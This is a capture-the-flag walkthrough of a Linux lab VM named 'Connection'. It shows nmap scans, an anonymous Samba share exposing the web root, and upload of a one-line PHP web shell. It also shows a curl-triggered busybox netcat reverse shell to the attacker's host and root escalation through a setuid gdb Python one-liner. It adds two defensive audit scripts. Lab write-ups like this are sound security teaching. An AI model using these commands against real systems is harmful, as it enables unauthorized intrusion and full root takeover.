This is a Linux machine with SSH, Web, and Samba services enabled. During web directory enumeration, we did not discover any useful clues, so we moved on to the Samba service. Fortunately, in one of the shares, we found that it exposed the root directory of the web service, which allowed us to upload a web shell and gain an initial foothold on the system.

After performing basic system enumeration (such as checking sudo rules and SUID files), we discovered that gdb was configured with the SUID bit set and owned by root. By leveraging gdb's scripting capabilities, we were able to execute commands with elevated privileges and ultimately obtain root access.

Summary

Scope

  • Name: Connection
  • Difficulty: Easy
  • OS: Linux
  • IP: Local VM

Learned

  • For the sharable service like FTP and Samba, we could try anonymous login first.
  • GTFObins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.

Enumeration

Nmap

Overall

# Nmap 7.98 scan initiated Mon Mar  2 14:10:44 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up (0.000034s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

# Nmap done at Mon Mar  2 14:10:49 2026 -- 1 IP address (1 host up) scanned in 4.40 seconds

Detail

# Nmap 7.98 scan initiated Mon Mar  2 14:11:54 2026 as: nmap -sC -sV -O -vv -p22,80,139,445 -oN detail 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up, received arp-response (0.00047s latency).
Scanned at 2026-03-02 14:11:59 CST for 12s

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:e6:01:b5:f9:06:a1:ea:40:04:29:44:f4:df:22:a1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxNh+4rTxFF/c8dZwGAg+SIl5zJE1Rq8y3vlHZ2P7gTdRQDb7XlWK8W5O0XVtBVqWlvLZlHIOniUJlSlcps51cHo58B9KczrZME5phRmiYLOo2pTBmra6sZADq7mmlHkpz1LbpmgzSGchrrp9pSxUjcdmpffhgd79i/q0d4ya7vK4R/tcegMNUxjkmW83JCu0Mc2qw3JvzqCQ5BGyrgGrsb4VguV/MZrPzX8nwM7i2ivsg+d171360aa9SXtoGELkBfeqCOKRCOckw2gfQlo2tsdc26jwimBygMPpkAH87zMJdl5iEX7p9tPr4ddIp9DtPjsSB3Cu2ObOr9iAYVvy5
|   256 fb:16:94:df:93:89:c7:56:85:84:22:9e:a0:be:7c:95 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNHVs0JAs/3OsoWURkn+P6KrjxC1zzMry+q3H+RX+UW05NQvD3NORKjL0gnr+LOumhE1cMGmCgMTcaJ41T5nbxM=
|   256 45:2e:fb:87:04:eb:d1:8b:92:6f:6a:ea:5a:a2:a1:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM9EVXAcxAJmQLNl3ttKL8QEWy+X+0R/rmS0tyt/bd2t
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:E7:32:42 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/2%OT=22%CT=%CU=36295%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:69A52A3B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 0.035 days (since Mon Mar  2 13:21:20 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 56669/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44585/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26727/udp): CLEAN (Failed to receive data)
|   Check 4 (port 46900/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: CONNECTION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   CONNECTION<00>       Flags: <unique><active>
|   CONNECTION<03>       Flags: <unique><active>
|   CONNECTION<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time: 
|   date: 2026-03-02T06:12:11
|_  start_date: N/A
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: connection
|   NetBIOS computer name: CONNECTION\x00
|   Domain name: \x00
|   FQDN: connection
|_  System time: 2026-03-02T01:12:11-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  2 14:12:11 2026 -- 1 IP address (1 host up) scanned in 16.90 seconds

UDPScan

# Nmap 7.98 scan initiated Mon Mar  2 14:12:52 2026 as: nmap -sU --top-ports 32 -oN udpscan 192.168.1.40
Nmap scan report for 192.168.1.40
Host is up (0.00057s latency).
Not shown: 29 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
MAC Address: 08:00:27:E7:32:42 (Oracle VirtualBox virtual NIC)

# Nmap done at Mon Mar  2 14:13:23 2026 -- 1 IP address (1 host up) scanned in 30.38 seconds

Web

Web enumeration gives me nothing interesting except the default index.html.

Samba

Next I try an anonymous login to the Samba service, and it succeeds.

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	share           Disk
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ smbclient -N //192.168.1.40/share
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 23 09:48:39 2020
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  html                                D        0  Wed Sep 23 10:20:00 2020

		7158264 blocks of size 1024. 5264532 blocks available
smb: \> cd html
smb: \html\> ls
  .                                   D        0  Wed Sep 23 10:20:00 2020
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  index.html                          N    10701  Wed Sep 23 09:48:45 2020

The index.html and the html directory make it clear that this share is the root directory of the web service. Since the share accepts uploads, we can drop a webshell there to get an initial foothold on the system.
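The share that exposed the web root is the kind of misconfiguration an smb.conf audit catches before anyone else does. The script below is an added example, not part of this write-up, and the smb.conf it parses is constructed (the box's real configuration was never shown): it reports every share that combines guest ok = yes with write access, and the sample file shows a hardened definition of the same directory beside the weak one.

```shell
#!/bin/sh
# Added example: find Samba shares that grant anonymous (guest) write access.
# The sample smb.conf below is constructed; paths and share names are assumptions.

audit_smb_conf() {
    # $1: path to an smb.conf
    # Prints "RISK <share> path=<path>" for each share with guest ok = yes and
    # write access (writable/writeable = yes, or read only = no).
    # Samba defaults are guest ok = no and read only = yes, so a share is only
    # flagged when both were explicitly opened up.
    awk '
        function norm(v) { v = tolower(v); return (v == "yes" || v == "true" || v == "1") ? "yes" : "no" }
        function flush() {
            if (sec != "" && tolower(sec) != "global" && guest == "yes" && writable == "yes")
                print "RISK " sec " path=" path
        }
        /^[[:space:]]*\[/ {                      # new [section]: report the previous one
            flush()
            sec = $0; sub(/^[[:space:]]*\[/, "", sec); sub(/].*$/, "", sec)
            guest = "no"; writable = "no"; path = ""
            next
        }
        /^[[:space:]]*[#;]/ { next }              # comment lines
        /=/ {
            key = $0; sub(/=.*$/, "", key); gsub(/^[[:space:]]+|[[:space:]]+$/, "", key)
            val = $0; sub(/^[^=]*=/, "", val); gsub(/^[[:space:]]+|[[:space:]]+$/, "", val)
            key = tolower(key)
            if (key == "guest ok" || key == "public") guest = norm(val)
            else if (key == "writable" || key == "writeable") writable = norm(val)
            else if (key == "read only") writable = (norm(val) == "no") ? "yes" : "no"
            else if (key == "path") path = val
        }
        END { flush() }
    ' "$1"
}

# Stand-alone demo on a constructed configuration.
demo_conf=$(mktemp)
cat > "$demo_conf" <<'EOF'
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

; weak: anonymous users can write into the web root
[share]
   comment = Private Share for uploading files
   path = /var/www
   guest ok = yes
   writable = yes

; hardened: same directory, authenticated users only, read-only
[share-hardened]
   path = /var/www
   guest ok = no
   read only = yes
   valid users = @webadmins
EOF
audit_smb_conf "$demo_conf"      # prints: RISK share path=/var/www
rm -f "$demo_conf"
```

Run it as audit_smb_conf /etc/samba/smb.conf. The map to guest and security settings in [global] also decide whether guest access works at all, so treat a RISK line as a share to confirm with testparm -s rather than as proof on its own.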

Foothold

echo '<?php system($_GET["cmd"]); ?>' > shell.php

After uploading shell.php through the share, requesting it with curl confirms command execution as the web server user.

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ curl http://192.168.1.40/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now nc will give us the initial foothold.

❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ curl 'http://192.168.1.40/shell.php?cmd=busybox%20nc%20192.168.1.33%204444%20-e%20%2Fbin%2Fbash'



❰curtain❙~/workspace/shooting/hmvm/connection❱✔≻ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.40 50348
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then I use script to get a more stable interactive shell.

script -q /dev/null -c bash
export TERM=xterm

Privilege Escalation

As usual, I gather the basic information needed for privilege escalation. When listing the SUID programs on the system, gdb stands out.

www-data@connection:/var/www/html$ find / -mount -perm -u=s 2>/dev/null
find / -mount -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
www-data@connection:/var/www/html$ ls -l /usr/bin/gdb
ls -l /usr/bin/gdb
-rwsr-sr-x 1 root root 8008480 Oct 14  2019 /usr/bin/gdb

And luckily, it is owned by root, with both the SUID and SGID bits set (-rwsr-sr-x). According to https://gtfobins.org/gtfobins/gdb/#shell, gdb can execute commands (including Python) passed with -ex at startup.

www-data@connection:/var/www/html$ gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

With euid equal to 0 (bash -p keeps the effective UID instead of dropping it), we're root!
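The root cause here is a setuid binary that embeds a scripting interpreter. As an added example (not part of the write-up), the script below runs the same kind of find used above over a directory tree and separates the setuid files into those on a watchlist of interpreters, debuggers and editors (the class GTFOBins catalogues; the list itself is a constructed starting point) from ordinary setuid helpers such as passwd and mount.

```shell
#!/bin/sh
# Added example: audit setuid files against a watchlist of programs that can run
# arbitrary code. Not from the write-up; WATCHLIST is a constructed starting point.

WATCHLIST="gdb python python2 python3 perl ruby lua node php vim vi nano less more find awk gawk env bash sh dash zsh"

list_suid() {
    # $1: directory to scan; equivalent to the write-up's find / -mount -perm -u=s
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

flag_suid() {
    # Prints "RISK <path>" for watchlisted names and "INFO <path>" for the rest,
    # so expected setuid helpers (passwd, mount, su, ...) stay visible but separate.
    list_suid "$1" | while IFS= read -r f; do
        base=$(basename "$f")
        if printf '%s\n' $WATCHLIST | grep -qxF -- "$base"; then
            echo "RISK $f"
        else
            echo "INFO $f"
        fi
    done
}

# Stand-alone demo on a constructed directory (no real setuid binaries needed;
# the setuid bit on a file you own can be set without root).
demo=$(mktemp -d)
touch "$demo/gdb" "$demo/passwd" "$demo/notes.txt"
chmod 4755 "$demo/gdb" "$demo/passwd"
flag_suid "$demo"        # prints RISK .../gdb and INFO .../passwd
rm -rf "$demo"
```

On a real host run flag_suid / as root and add an owner check (the write-up's ls -l step) for anything flagged; the fix for a hit like gdb is chmod u-s,g-s on the binary, since a debugger never needs to be setuid.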